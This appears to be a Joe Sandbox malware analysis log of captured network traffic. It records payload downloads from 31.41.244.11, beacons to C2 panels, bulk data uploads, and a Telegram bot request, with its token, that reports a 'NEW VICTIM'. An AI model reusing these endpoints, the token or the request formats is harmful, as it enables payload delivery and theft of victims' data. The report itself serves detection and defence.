Source: global traffic HTTP traffic detected: GET /files/kardanvalov88/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 33 31 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019318001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 39 30 46 42 36 34 38 42 42 44 37 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECB90FB648BBD71F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic HTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 39 30 46 42 36 34 38 42 42 44 37 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECB90FB648BBD71F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 33 31 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019319001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 39 30 46 42 36 34 38 42 42 44 37 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECB90FB648BBD71F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic HTTP traffic detected: GET /files/loadman/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 504087
Source: global traffic HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 39 30 46 42 36 34 38 42 42 44 37 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECB90FB648BBD71F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 33 32 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019320001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/karl/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /zldPRFrmVFHTtKntGpOv1734579851?argument=CmXX9uDEYSg7ov7J1734779763 HTTP/1.1Host: home.fivetk5ht.topAccept: */*
Source: global traffic HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 39 30 46 42 36 34 38 42 42 44 37 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECB90FB648BBD71F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 33 32 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019321001&unit=246122658369
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: ipinfo.io
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49760 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49787 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49805 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49810 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49809 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49816 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49829 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49833 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49842 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49850 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49853 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49825 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49867 -> 104.21.67.146:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49892 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49915 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49925 -> 104.21.91.209:443
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=krR5sxDNE9FUa.r1_N2PJQUMG47JPl6SF8wl79F24pI-1734779729-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Q16GXYS6BSXCA0GFZKDCookie: __cf_mw_byp=krR5sxDNE9FUa.r1_N2PJQUMG47JPl6SF8wl79F24pI-1734779729-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18172Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MVU42RO0L29Cookie: __cf_mw_byp=krR5sxDNE9FUa.r1_N2PJQUMG47JPl6SF8wl79F24pI-1734779729-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8745Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BI1K9O4J8Cookie: __cf_mw_byp=krR5sxDNE9FUa.r1_N2PJQUMG47JPl6SF8wl79F24pI-1734779729-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20386Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=052ZCT1NTXF1P96Cookie: __cf_mw_byp=krR5sxDNE9FUa.r1_N2PJQUMG47JPl6SF8wl79F24pI-1734779729-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1284Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CCBHJ3TNCookie: __cf_mw_byp=krR5sxDNE9FUa.r1_N2PJQUMG47JPl6SF8wl79F24pI-1734779729-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568140Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=krR5sxDNE9FUa.r1_N2PJQUMG47JPl6SF8wl79F24pI-1734779729-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: cheapptaxysu.click
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AFE0C0 recv,recv,recv,recv, 0_2_00AFE0C0
Source: global traffic HTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20494126%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20494126%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/geopoxid/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/zhigarko/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/kardanvalov88/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/loadman/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /files/karl/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /zldPRFrmVFHTtKntGpOv1734579851?argument=CmXX9uDEYSg7ov7J1734779763 HTTP/1.1Host: home.fivetk5ht.topAccept: */*
Source: global traffic DNS traffic detected: DNS query: cheapptaxysu.click
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: httpbin.org
Source: global traffic DNS traffic detected: DNS query: home.fivetk5ht.top
Source: global traffic DNS traffic detected: DNS query: treehoneyi.click
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 21 Dec 2024 11:15:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HpnOlsQBYc93jnYqYKuP7cMib0EwdqtVBwn5RuDo56tugvY6ia3%2B3FlLP%2BMIALvVv8C69qFtyb%2FKTwMzISNk73H915lc09QWMM5EuAkCc31EYOR%2BuWNMi1Koc%2F1QynmcNKajayk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f57745ffddf424a-EWR
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://.css
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://.jpg
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000005.00000002.2942570852.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php;:
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpO
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/32
Source: Gxtuum.exe, 00000026.00000002.2935835447.0000000001587000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000026.00000002.2935835447.00000000015C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php%
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php0
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php2
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php5
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php6
Source: Gxtuum.exe, 00000026.00000002.2935835447.0000000001587000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php9
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpO
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpY
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpa=
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpd0f87c9fba7075c3b39K=
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phped
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpedh
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpf-
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpurlmon.dll
Source: Gxtuum.exe, 00000026.00000002.2935835447.00000000015C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/A
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/burpin1/random.exe
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/burpin1/random.exe6H
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/burpin1/random.exeC
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/burpin1/random.exeD
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/geopoxid/random.exe
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/kardanvalov88/random.exe
